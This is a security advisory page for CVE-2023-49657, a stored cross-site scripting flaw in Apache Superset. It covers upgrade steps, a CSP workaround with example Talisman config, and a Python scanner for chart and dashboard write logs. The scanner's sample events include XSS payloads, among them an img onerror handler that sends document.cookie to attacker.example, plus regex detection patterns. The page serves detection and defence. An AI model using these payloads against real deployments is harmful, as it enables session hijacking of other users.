CVE-2023-49657

9.6 CRITICAL

📋 TL;DR

This stored cross-site scripting (XSS) vulnerability in Apache Superset allows authenticated attackers with create/update permissions to inject malicious scripts into charts or dashboards. When other users view these compromised elements, the attacker's scripts execute in their browser context. This affects all Apache Superset instances before version 3.0.3.

💻 Affected Systems

Products:
  • Apache Superset
Versions: All versions before 3.0.3
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated user with create/update permissions on charts or dashboards. Default configurations are vulnerable.

📦 What is this software?

Apache Superset is an open-source data exploration and visualization platform: a Python (Flask) web application with a React front end that lets users build SQL-backed charts and assemble them into dashboards that are shared with other users. Because charts and dashboards are authored by some users and rendered in the browsers of others, any chart or dashboard field that reaches the page without escaping is a stored-XSS sink, which is exactly the class of bug this CVE describes.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, redirect to malicious sites, or compromise user accounts and data.

🟠

Likely Case

Attackers with legitimate permissions abuse their access to inject scripts that steal session tokens or perform unauthorized actions on behalf of other users.

🟢

If Mitigated

With Talisman enabled and a nonce-based Content Security Policy (CSP), as in the vendor's workaround for 2.X, an injected script is still stored but is not executed by the browser, so the impact shrinks to defaced chart or dashboard content and the cleanup of the stored markup. CSP is a containment measure; the 3.0.3 upgrade removes the rendering defect itself.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access but is technically simple once permissions are obtained. Stored XSS payloads persist until removed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.0.3

Vendor Advisory: https://lists.apache.org/thread/wjyvz8om9nwd396lh0bt156mtwjxpsvx

Restart Required: Yes

Instructions:

1. Upgrade Apache Superset to version 3.0.3 or later, following the normal upgrade procedure for your deployment (package or container image update plus the usual database migration step).
2. Restart the Superset web and worker processes so the new code is served.
3. Verify the upgrade completed successfully (see How to Verify below).
4. Review charts and dashboards created or modified before the upgrade for injected markup (see Detection & Monitoring): the patch stops stored content from executing, but the content itself remains in the metadata database until someone removes it.

🔧 Temporary Workarounds

Implement Content Security Policy for 2.X versions

Applies to: all 2.X deployments that cannot move to 3.0.3 yet

Add the TALISMAN_CONFIG dictionary from the vendor advisory to your superset_config.py and make sure TALISMAN_ENABLED is True; Superset only hands TALISMAN_CONFIG to Flask-Talisman when Talisman is enabled, so defining the dictionary alone changes nothing. The advisory's policy restricts script-src to 'self' and 'strict-dynamic' and requires a per-response nonce for scripts, so a stored script tag or inline event handler in chart or dashboard metadata is not executed by a CSP-aware browser. Restart Superset after changing the config and confirm that responses now carry a Content-Security-Policy header.
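The advisory's TALISMAN_CONFIG is not reproduced on this page. The following superset_config.py fragment is an added example, not copied from the advisory or from the Superset source: it places a weak policy next to a hardened one of the shape the advisory recommends (script-src limited to 'self' and 'strict-dynamic', nonce required for script-src) and adds a small check that tells the two apart. The allowlisted hosts a real deployment needs for map tiles or telemetry are deployment-specific and are left out; WEAK_TALISMAN_CONFIG and script_src_allows_inline are names chosen for this example only.

```python
# superset_config.py fragment (added example, not the project's own file).
# Superset passes TALISMAN_CONFIG to Flask-Talisman only when this is True.
TALISMAN_ENABLED = True

# Weak policy for comparison: 'unsafe-inline' in script-src lets any stored
# <script> tag or on* handler execute, so it gives no protection here.
WEAK_TALISMAN_CONFIG = {
    "content_security_policy": {
        "default-src": ["'self'"],
        "script-src": ["'self'", "'unsafe-inline'"],
    },
    "force_https": False,
}

# Hardened policy modelled on the advisory's shape (host allowlists omitted):
# scripts run only if same-origin or carrying the per-response nonce, and
# 'strict-dynamic' makes browsers ignore any 'unsafe-inline' that sneaks in.
TALISMAN_CONFIG = {
    "content_security_policy": {
        "base-uri": ["'self'"],
        "default-src": ["'self'"],
        "img-src": ["'self'", "blob:", "data:"],
        "worker-src": ["'self'", "blob:"],
        "connect-src": ["'self'"],           # add map/tile API hosts if you use them
        "object-src": "'none'",
        "style-src": ["'self'", "'unsafe-inline'"],
        "script-src": ["'self'", "'strict-dynamic'"],
    },
    "content_security_policy_nonce_in": ["script-src"],
    "force_https": False,            # set True when TLS terminates at Superset
    "session_cookie_secure": False,  # set True behind HTTPS
}


def script_src_allows_inline(cfg):
    """Return True if this Talisman config would still let injected inline
    script run in a CSP-aware browser.

    Inline script executes when there is no policy, when script-src (or its
    default-src fallback) is absent, or when 'unsafe-inline' is present and
    nothing neutralises it. A nonce requirement for script-src or the
    'strict-dynamic' keyword both cause 'unsafe-inline' to be ignored.
    """
    csp = cfg.get("content_security_policy") or {}
    if not csp:
        return True                      # no CSP at all
    sources = csp.get("script-src")
    if sources is None:
        sources = csp.get("default-src")
    if sources is None:
        return True                      # script loading unrestricted
    if isinstance(sources, str):
        sources = [sources]
    sources = set(sources)
    nonce_targets = set(cfg.get("content_security_policy_nonce_in") or [])
    if "'strict-dynamic'" in sources or "script-src" in nonce_targets:
        return False
    return "'unsafe-inline'" in sources


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_TALISMAN_CONFIG), ("hardened", TALISMAN_CONFIG)):
        print(name, "allows inline script:", script_src_allows_inline(cfg))
```

Run the module directly to compare the two policies; in a real deployment keep only TALISMAN_CONFIG, extend connect-src and img-src with the external hosts your charts actually load, and re-test dashboards after the change, since an over-tight policy breaks map and image plugins before it breaks the attacker.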

🧯 If You Can't Patch

  • Restrict the ability to create or update charts and dashboards to the smallest set of trusted users: review which Superset roles hold write permission on Chart and Dashboard and remove it from broadly assigned roles. Bear in mind that any remaining analyst account is still a viable attacker if compromised.
  • Enable Talisman with a nonce-based CSP (see Temporary Workarounds); this is the most reliable stop-gap because it blocks execution regardless of which field carries the payload.
  • Implement web application firewall (WAF) rules to detect and block XSS payloads, but treat them as defence in depth only: payloads arrive JSON-encoded inside API request bodies (chart params, dashboard json_metadata) and are easy to obfuscate, so signature rules will miss variants.

🔍 How to Verify

Check if Vulnerable:

Check your Apache Superset version with the CLI below (or the installed package version from pip show apache-superset inside the Superset environment). If it is below 3.0.3, you are vulnerable unless a nonce-based CSP is already enforced through TALISMAN_CONFIG.

Check Version:

superset version

Verify Fix Applied:

Verify the version is 3.0.3 or higher. Then, in a non-production instance and with a low-privilege test account, save a chart whose name or description contains a harmless marker (an HTML tag with an event handler is enough), open it as a different user, and confirm the marker is rendered as literal text rather than executed. If you rely on the CSP workaround, also confirm that HTTP responses carry a Content-Security-Policy header whose script-src does not allow 'unsafe-inline' without a nonce.

📡 Detection & Monitoring

Log Indicators:

  • Unusual chart/dashboard creation/modification patterns
  • JavaScript or HTML snippets in chart/dashboard metadata fields

Network Indicators:

  • Browser requests from Superset users to unknown external hosts while a dashboard is open (cookie or data exfiltration via fetch or image beacons)
  • Suspicious script loading in HTTP responses

SIEM Query (pseudo-query; adjust the source, field and event names to your log pipeline):

source="superset" AND (event="chart_create" OR event="chart_update" OR event="dashboard_create" OR event="dashboard_update") AND (payload CONTAINS "<script" OR payload CONTAINS "javascript:" OR payload MATCHES "on[a-z]+=")

The event names are placeholders. Superset's built-in database event logger records the API class and method as the action (for example ChartRestApi.post or DashboardRestApi.put), and the submitted chart params and dashboard json_metadata are JSON, so match on the decoded payload rather than the raw request line if your logger captures request bodies. Dashboard Markdown components may legitimately contain HTML, so treat hits as triage leads rather than automatic blocks.
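As an added example that is not part of this page or the Superset project, the following Python applies the log indicators and the SIEM query logic above to chart and dashboard write events offline. The event format (one JSON object per line with action, user, object_id and payload) and the action names are assumptions to be mapped onto what your own event logger or SIEM records; the sample events are constructed, and the fields used (slice_name, json_metadata, css) are illustrative, since the advisory does not name the vulnerable field.

```python
"""Flag script-capable markup in Superset chart/dashboard write events.

Added example, not Superset's own code. Event shape is assumed: one JSON
object per line with action, user, object_id and payload, where payload is
the submitted chart params or dashboard metadata.
"""
import json
import re

# Indicators of stored-XSS payloads in fields that should hold plain data.
SUSPICIOUS_PATTERNS = [
    ("script_tag", re.compile(r"<\s*script\b", re.IGNORECASE)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.IGNORECASE)),
    ("inline_handler", re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)),
    ("active_element", re.compile(r"<\s*(svg|iframe|object|embed)\b", re.IGNORECASE)),
]

# Assumed action names for chart/dashboard writes; reads are ignored.
WRITE_ACTIONS = {
    "ChartRestApi.post", "ChartRestApi.put",
    "DashboardRestApi.post", "DashboardRestApi.put",
}

# Constructed sample events, not real logs: one benign edit, two injections,
# and one read-only request that must be skipped.
SAMPLE_EVENTS = [
    json.dumps({"action": "ChartRestApi.put", "user": "alice", "object_id": 12,
                "payload": {"viz_type": "table", "slice_name": "Sales by region"}}),
    json.dumps({"action": "ChartRestApi.post", "user": "mallory", "object_id": 47,
                "payload": {"viz_type": "table",
                            "slice_name": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"}}),
    json.dumps({"action": "DashboardRestApi.put", "user": "mallory", "object_id": 3,
                "payload": {"json_metadata": {"label_colors": {"<script>alert(1)</script>": "#fff"}},
                            "css": "body{background:url(javascript:alert(1))}"}}),
    json.dumps({"action": "ChartRestApi.get", "user": "bob", "object_id": 12,
                "payload": {}}),
]


def iter_strings(obj, path="payload"):
    """Yield (json_path, text) for every string in obj, including dict keys,
    because a key such as a label_colors entry is rendered like a value."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield f"{path}.{key}", key
            yield from iter_strings(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from iter_strings(value, f"{path}[{index}]")
    elif isinstance(obj, str):
        yield path, obj


def scan_event(line):
    """Return a list of findings for one JSON event line (empty if clean)."""
    event = json.loads(line)
    if event.get("action") not in WRITE_ACTIONS:
        return []
    payload = event.get("payload", {})
    if isinstance(payload, str):          # some loggers store the body as text
        try:
            payload = json.loads(payload)
        except ValueError:
            pass                          # fall back to scanning the raw string
    findings = []
    for path, text in iter_strings(payload):
        for indicator, pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(text):
                findings.append({
                    "user": event.get("user"),
                    "action": event["action"],
                    "object_id": event.get("object_id"),
                    "field": path,
                    "indicator": indicator,
                    "sample": text[:80],
                })
    return findings


def scan_events(lines):
    """Scan an iterable of event lines and return every finding."""
    findings = []
    for line in lines:
        findings.extend(scan_event(line))
    return findings


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Feed it the JSON-lines export of your chart and dashboard write events; a finding names the user, the object and the JSON path of the suspect string, which is what you need to locate and remove the stored payload. Expect some noise from dashboards whose Markdown components legitimately carry HTML, so review hits rather than acting on them automatically.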

🔗 References

  • Apache Superset security advisory for CVE-2023-49657: https://lists.apache.org/thread/wjyvz8om9nwd396lh0bt156mtwjxpsvx